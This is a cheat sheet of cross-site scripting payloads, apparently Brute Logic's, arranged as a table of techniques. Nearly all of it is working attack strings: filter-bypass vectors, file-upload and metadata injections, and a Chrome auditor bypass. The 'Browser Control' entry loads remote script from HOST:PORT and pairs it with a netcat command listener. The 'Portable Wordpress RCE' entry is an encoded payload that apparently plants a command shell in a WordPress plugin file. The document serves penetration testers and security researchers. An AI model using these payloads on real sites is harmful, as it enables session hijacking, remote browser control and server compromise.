Basic and advanced exploits for XSS proofs and attacks.
Work in progress, bookmark it.
Technique | Vector/Payload * | ||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
* In URLs: | & => %26 , # => %23 , + => %2B | ||||||||||||||||||
HTML Context Tag Injection | <svg οnlοad=alert(1)> "><svg οnlοad=alert(1)// | ||||||||||||||||||
HTML Context Inline Injection | "οnmοuseοver=alert(1)// "autofocus/οnfοcus=alert(1)// | ||||||||||||||||||
Javascript Context Code Injection | '-alert(1)-' '-alert(1)// | ||||||||||||||||||
Javascript Context Code Injection (escaping the escape) | \'-alert(1)// | ||||||||||||||||||
Javascript Context Tag Injection | </script><svg οnlοad=alert(1)> | ||||||||||||||||||
PHP_SELF Injection | http://DOMAIN/PAGE.php/"><svg οnlοad=alert(1)> | ||||||||||||||||||
Without Parenthesis | <svg οnlοad=alert`1`> <svg οnlοad=alert(1)> <svg οnlοad=alert(1)> <svg οnlοad=alert(1)> | ||||||||||||||||||
Filter Bypass Alert Obfuscation | (alert)(1) a=alert,a(1) [1].find(alert) top["al"+"ert"](1) top[/al/.source+/ert/.source](1) al\u0065rt(1) top['al\145rt'](1) top['al\x65rt'](1) top[8680439..toString(30)](1) | ||||||||||||||||||
Body Tag | <body οnlοad=alert(1)> <body οnpageshοw=alert(1)> <body οnfοcus=alert(1)> <body οnhashchange=alert(1)><a href=#x>click this!#x <body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x <body οnscrοll=alert(1)><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><x id=x>#x <body οnresize=alert(1)>press F12! <body onhelp=alert(1)>press F1! (MSIE) | ||||||||||||||||||
Miscellaneous Vectors | <marquee onstart=alert(1)> <marquee loop=1 width=0 onfinish=alert(1)> <audio src οnlοadstart=alert(1)> <video οnlοadstart=alert(1)><source> <input autofocus οnblur=alert(1)> <keygen autofocus οnfοcus=alert(1)> <form οnsubmit=alert(1)><input type=submit> <select οnchange=alert(1)><option>1<option>2 <menu id=x contextmenu=x οnshοw=alert(1)>right click me! | ||||||||||||||||||
Agnostic Event Handlers | <x contenteditable οnblur=alert(1)>lose focus! <x οnclick=alert(1)>click this! <x οncοpy=alert(1)>copy this! <x οncοntextmenu=alert(1)>right click this! <x oncut=alert(1)>copy this! <x οndblclick=alert(1)>double click this! <x οndrag=alert(1)>drag this! <x contenteditable οnfοcus=alert(1)>focus this! <x contenteditable οninput=alert(1)>input here! <x contenteditable οnkeydοwn=alert(1)>press any key! <x contenteditable οnkeypress=alert(1)>press any key! <x contenteditable οnkeyup=alert(1)>press any key! <x οnmοusedοwn=alert(1)>click this! <x οnmοusemοve=alert(1)>hover this! <x οnmοuseοut=alert(1)>hover this! <x οnmοuseοver=alert(1)>hover this! <x οnmοuseup=alert(1)>click this! <x contenteditable οnpaste=alert(1)>paste here! | ||||||||||||||||||
Code Reuse Inline Script | <script>alert(1)// <script>alert(1)<!– | ||||||||||||||||||
Code Reuse Regular Script | <script src=//brutelogic.com.br/1.js> <script src=//3334957647/1> | ||||||||||||||||||
Filter Bypass Generic Tag + Handler |
| ||||||||||||||||||
Generic Source Breaking | <x onxxx=alert(1) 1=' | ||||||||||||||||||
Browser Control | <svg οnlοad=setInterval(function(){with(document)body. appendChild(createElement('script')).src='//HOST:PORT'},0)> $ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | ||||||||||||||||||
Multi Reflection |
| ||||||||||||||||||
Without Event Handlers | <script>alert(1)</script> <script src=javascript:alert(1)> <iframe src=javascript:alert(1)> <embed src=javascript:alert(1)> <a href=javascript:alert(1)>click <math><brute href=javascript:alert(1)>click <form action=javascript:alert(1)><input type=submit> <isindex action=javascript:alert(1) type=submit value=click> <form><button formaction=javascript:alert(1)>click <form><input formaction=javascript:alert(1) type=submit value=click> <form><input formaction=javascript:alert(1) type=image value=click> <form><input formaction=javascript:alert(1) type=image src=SOURCE> <isindex formaction=javascript:alert(1) type=submit value=click> <object data=javascript:alert(1)> <iframe srcdoc=<svg/onload=alert(1)>> <svg><script xlink:href=data:,alert(1) /> <math><brute xlink:href=javascript:alert(1)>click <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | ||||||||||||||||||
Mobile Only |
| ||||||||||||||||||
Generic Self to Regular XSS | <iframe src=LOGOUT_URL οnlοad=forms[0].submit()> </iframe><form method=post action=LOGIN_URL> <input name=USERNAME_PARAMETER_NAME value=USERNAME> <input name=PASSWORD_PARAMETER_NAME value=PASSWORD> | ||||||||||||||||||
File Upload | Injection in Filename "><img src=1 οnerrοr=alert(1)>.gif Injection in Metadata $ exiftool -Artist='"><img src=1 οnerrοr=alert(1)>' FILENAME.jpeg Injection with SVG File <svg xmlns="http://www.w3.org/2000/svg" οnlοad="alert(document.domain)"/> Injection with GIF File as Source of Script (CSP Bypass) GIF89a/*<svg/οnlοad=alert(1)>*/=alert(document.domain)//; | ||||||||||||||||||
Google Chrome Auditor Bypass (up to v51) | <script src="data:,alert(1)// "><script src=data:,alert(1)// <script src="//brutelogic.com.br/1.js# "><script src=//brutelogic.com.br/1.js# <link rel=import href="data:text/html,<script>alert(1)</script> "><link rel=import href=data:text/html,<script>alert(1)</script> | ||||||||||||||||||
PHP File for XHR Remote Call | <?php header(“Access-Control-Allow-Origin: *”); ?> <img src=1 οnerrοr=alert(1)> | ||||||||||||||||||
Server Log Avoidance | <svg οnlοad=eval(URL.slice(-8))>#alert(1) <svg οnlοad=eval(location.hash.slice(1)>#alert(1) <svg οnlοad=innerHTML=location.hash>#<script>alert(1)</script> | ||||||||||||||||||
Shortest PoC | <base href=//0> $ while:; do echo "alert(1)" | nc -lp80; done | ||||||||||||||||||
Portable Wordpress RCE | <script/src="data:,eval(atob(location.hash.slice(1)))//# #eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC 5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE 9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD Qp4LnNlbmQoJCk= http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD |